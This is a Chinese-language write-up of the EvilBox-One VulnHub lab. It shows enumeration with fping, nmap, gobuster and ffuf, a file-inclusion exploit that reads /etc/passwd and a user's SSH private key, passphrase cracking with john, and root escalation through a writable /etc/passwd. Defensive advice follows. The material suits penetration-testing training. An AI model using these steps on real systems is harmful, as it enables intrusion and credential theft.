一起来打靶:Evil-Box靶场实战详解
字数 1177 2025-08-12 11:33:35

Evil-Box靶场实战教学文档

一、靶机概述

  • 靶机名称: EvilBox-One
  • 难度等级: 低→中
  • 目标: 取得root权限 + 获取2个Flag
  • 下载地址: https://download.vulnhub.com/evilbox/EvilBox---One.ova
  • 特点: 边界突破和提权方法新颖,适合初学者学习渗透思路

二、环境配置

  1. 将Kali和靶机镜像放置同一网段
  2. 确保网络连通性

三、使用工具介绍

3.1 fping

用于多主机同时ping检测,比传统ping更高效

常用参数:

  • -a: 显示存活的主机
  • -g: 通过指定开始和结束地址生成目标列表
  • -u: 显示不可到达的目标

3.2 Gobuster

高效的目录扫描工具,支持多种模式

模式:

  • dir: 经典目录暴力破解
  • dns: DNS子域暴力破解
  • vhost: 虚拟主机暴力破解
  • s3: S3存储桶枚举

常用命令:

gobuster dir -u http://example.com -w /usr/share/wordlists/dirb/big.txt -t 50 -x php,html,asp,txt

3.3 FFuf

Go语言编写的高速Web Fuzzer,速度快且功能强大

用途:

  • 目录发现
  • 子域名发现
  • HTTP方法模糊测试

四、渗透测试流程

4.1 主机发现

fping -gaq 192.168.147.0/24

4.2 网络扫描

nmap 192.168.147.134
sudo nmap -p22,80 -sV -sS 192.168.147.134

4.3 Web目录探测

gobuster dir -u http://192.168.147.134/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-1.0.txt -x txt,php,html,jsp

发现:

  • /robots.txt: 显示"Hello H4x0r"(潜在用户名线索)
  • /secret/: 空白页面
  • /secret/evil.php: 空白页面

4.4 参数爆破

使用FFuf进行参数爆破:

  1. 第一次尝试:
ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:PARAM -w kkboss.txt:kk -u http://192.168.147.134/secret/evil.php?PARAM=kk -fs 0
  1. 第二次尝试(修改参数值):
ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -u http://192.168.147.134/secret/evil.php?FUZZ=../index.html -fs 0

发现: command参数存在文件包含漏洞

4.5 文件包含利用

http://192.168.147.134/secret/evil.php?command=etc/passwd

发现: 用户mowree

尝试远程文件包含和写入webshell失败后,转向SSH相关文件读取

4.6 SSH相关文件读取

  1. 读取authorized_keys:
/secret/evil.php?command=home/mowree/.ssh/authorized_keys
  1. 读取私钥:
/secret/evil.php?command=home/mowree/.ssh/id_rsa

4.7 SSH公钥登录

  1. 保存私钥并设置权限:
vi id_rsa
chmod 600 id_rsa
  1. 尝试登录:
ssh mowree@192.168.147.134 -i id_rsa
  1. 离线破解私钥密码:
cp /usr/share/wordlists/rockyou.txt.gz .
gunzip rockyou.txt.gz
cd /usr/share/john
./ssh2john.py ~/id_rsa > ~/kk
cd
john kk --wordlist=rockyou.txt

发现: 私钥密码为unicorn,获取Flag-1

4.8 权限提升

  1. 信息收集:
crontab -l
sudo -l
uname -a
find / -perm /4000 2>/dev/null
find / -perm /2000 2>/dev/null
find / -writable 2>/dev/null
find / -writable 2>/dev/null | grep -v proc

发现: /etc/passwd可写

  1. 修改root密码:
openssl passwd -1
vi /etc/passwd
  1. 切换root用户:
su
cd /root

获取Flag-2

五、关键知识点总结

  1. 主机发现技巧: 使用fping快速扫描存活主机
  2. 目录爆破: Gobuster的高效使用
  3. 参数爆破: FFuf工具的使用方法
  4. 文件包含漏洞: 利用文件包含读取系统敏感文件
  5. SSH私钥利用: 获取和破解SSH私钥的方法
  6. 权限提升: 通过可写的/etc/passwd文件直接修改root密码
  7. 信息收集: 系统权限、SUID文件、可写文件等关键检查点

六、防御建议

  1. 限制敏感文件权限(如/etc/passwd)
  2. 禁用不必要的文件包含功能
  3. 加强SSH密钥管理
  4. 定期检查系统可写文件
  5. 最小化Web服务器目录暴露
  6. 对用户输入进行严格过滤
Evil-Box靶场实战教学文档 一、靶机概述 靶机名称 : EvilBox-One 难度等级 : 低→中 目标 : 取得root权限 + 获取2个Flag 下载地址 : https://download.vulnhub.com/evilbox/EvilBox---One.ova 特点 : 边界突破和提权方法新颖,适合初学者学习渗透思路 二、环境配置 将Kali和靶机镜像放置同一网段 确保网络连通性 三、使用工具介绍 3.1 fping 用于多主机同时ping检测,比传统ping更高效 常用参数 : -a : 显示存活的主机 -g : 通过指定开始和结束地址生成目标列表 -u : 显示不可到达的目标 3.2 Gobuster 高效的目录扫描工具,支持多种模式 模式 : dir : 经典目录暴力破解 dns : DNS子域暴力破解 vhost : 虚拟主机暴力破解 s3 : S3存储桶枚举 常用命令 : 3.3 FFuf Go语言编写的高速Web Fuzzer,速度快且功能强大 用途 : 目录发现 子域名发现 HTTP方法模糊测试 四、渗透测试流程 4.1 主机发现 4.2 网络扫描 4.3 Web目录探测 发现 : /robots.txt : 显示"Hello H4x0r"(潜在用户名线索) /secret/ : 空白页面 /secret/evil.php : 空白页面 4.4 参数爆破 使用FFuf进行参数爆破: 第一次尝试: 第二次尝试(修改参数值): 发现 : command 参数存在文件包含漏洞 4.5 文件包含利用 发现 : 用户 mowree 尝试远程文件包含和写入webshell失败后,转向SSH相关文件读取 4.6 SSH相关文件读取 读取authorized_ keys: 读取私钥: 4.7 SSH公钥登录 保存私钥并设置权限: 尝试登录: 离线破解私钥密码: 发现 : 私钥密码为 unicorn ,获取Flag-1 4.8 权限提升 信息收集: 发现 : /etc/passwd 可写 修改root密码: 切换root用户: 获取Flag-2 五、关键知识点总结 主机发现技巧 : 使用fping快速扫描存活主机 目录爆破 : Gobuster的高效使用 参数爆破 : FFuf工具的使用方法 文件包含漏洞 : 利用文件包含读取系统敏感文件 SSH私钥利用 : 获取和破解SSH私钥的方法 权限提升 : 通过可写的/etc/passwd文件直接修改root密码 信息收集 : 系统权限、SUID文件、可写文件等关键检查点 六、防御建议 限制敏感文件权限(如/etc/passwd) 禁用不必要的文件包含功能 加强SSH密钥管理 定期检查系统可写文件 最小化Web服务器目录暴露 对用户输入进行严格过滤